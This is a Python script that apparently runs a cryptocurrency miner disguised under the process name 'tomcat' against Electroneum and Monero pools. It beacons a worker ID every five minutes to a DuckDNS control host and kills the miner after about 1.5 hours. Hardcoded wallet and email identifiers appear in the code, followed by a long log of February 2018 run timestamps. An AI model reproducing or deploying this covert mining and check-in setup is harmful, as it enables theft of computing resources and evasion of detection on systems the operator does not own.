import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:02:01.742031
#2018-02-17 16:48:01.395142
#2018-02-17 18:36:07.438142
#2018-02-17 20:25:05.539712
#2018-02-17 22:12:04.095417
#2018-02-17 23:56:02.119122
#2018-02-18 01:47:07.412343
#2018-02-18 03:36:02.198453
#2018-02-18 05:23:02.003856
#2018-02-18 07:14:05.739267
#2018-02-18 09:02:06.154876
#2018-02-18 10:49:04.439994
#2018-02-18 12:34:02.607348
#2018-02-18 14:21:05.134839
#2018-02-18 16:12:01.715567
#2018-02-18 18:00:05.509930
#2018-02-18 19:47:01.643987
#2018-02-18 21:32:06.808340
#2018-02-18 23:21:06.544351
#2018-02-19 01:08:01.712271
#2018-02-19 02:54:01.929596
#2018-02-19 04:40:04.278422
#2018-02-19 06:24:05.275234
#2018-02-19 08:13:02.115513
#2018-02-19 10:03:02.178560
#2018-02-19 11:51:04.123853
#2018-02-19 13:39:03.716822
#2018-02-19 15:28:06.718504
#2018-02-19 17:16:04.512864
#2018-02-19 19:05:08.317824
#2018-02-19 20:50:08.593806
#2018-02-19 22:41:08.100573
#2018-02-20 00:25:07.822860
#2018-02-20 02:13:01.756224
#2018-02-20 04:04:06.675490
#2018-02-20 05:49:04.627584
#2018-02-20 07:35:06.299154
#2018-02-20 09:19:04.987853
#2018-02-20 11:03:07.397174
#2018-02-20 12:50:02.063863
#2018-02-20 14:35:07.972318
#2018-02-20 16:21:07.886985
#2018-02-20 18:07:04.858166
#2018-02-20 19:58:02.215632
#2018-02-20 21:46:09.105071
#2018-02-20 23:29:04.397129
#2018-02-21 01:14:05.636983
#2018-02-21 03:01:07.930205
#2018-02-21 04:50:03.838221
#2018-02-21 06:36:05.333009
#2018-02-21 08:22:04.260906
#2018-02-21 10:08:01.874429
#2018-02-21 11:56:09.450475
#2018-02-21 13:46:06.368895
#2018-02-21 15:28:07.504576
#2018-02-21 17:20:05.193281
#2018-02-21 19:08:04.558407
#2018-02-21 20:56:03.991829
#2018-02-21 22:41:06.831539
#2018-02-22 00:29:06.353698
#2018-02-22 02:17:06.823659
#2018-02-22 04:04:04.723758
#2018-02-22 05:49:07.975933
#2018-02-22 07:36:04.371256
#2018-02-22 09:25:09.215995
#2018-02-22 11:12:08.449014
#2018-02-22 12:58:01.944472
#2018-02-22 14:46:07.132371
#2018-02-22 16:32:09.764148
#2018-02-22 18:19:05.536016
#2018-02-22 20:11:04.625747
#2018-02-22 21:58:02.065403
#2018-02-22 23:45:11.174979
#2018-02-23 01:33:01.415026
#2018-02-23 03:19:01.744982
#2018-02-23 05:05:08.255679
#2018-02-23 06:50:05.032627
#2018-02-23 08:38:07.808444
#2018-02-23 10:53:03.781191
#2018-02-23 12:50:05.872400
#2018-02-23 14:34:03.771382
#2018-02-23 16:25:14.212040
#2018-02-23 18:11:08.983112
#2018-02-23 19:58:01.546508
#2018-02-23 21:43:06.373397
#2018-02-23 23:37:03.340471
#2018-02-24 01:26:07.801733
#2018-02-24 03:16:05.227225
#2018-02-24 05:01:07.421224
#2018-02-24 06:50:07.995547
#2018-02-24 08:34:01.374814
#2018-02-24 10:20:05.701264
#2018-02-24 12:15:09.057481
#2018-02-24 14:06:05.582999
#2018-02-24 15:53:07.651870
#2018-02-24 17:47:03.859549
#2018-02-24 19:35:06.934351
#2018-02-24 21:22:07.701889
#2018-02-25 00:02:06.610071
#2018-02-25 04:16:06.924562
#2018-02-25 07:46:07.175370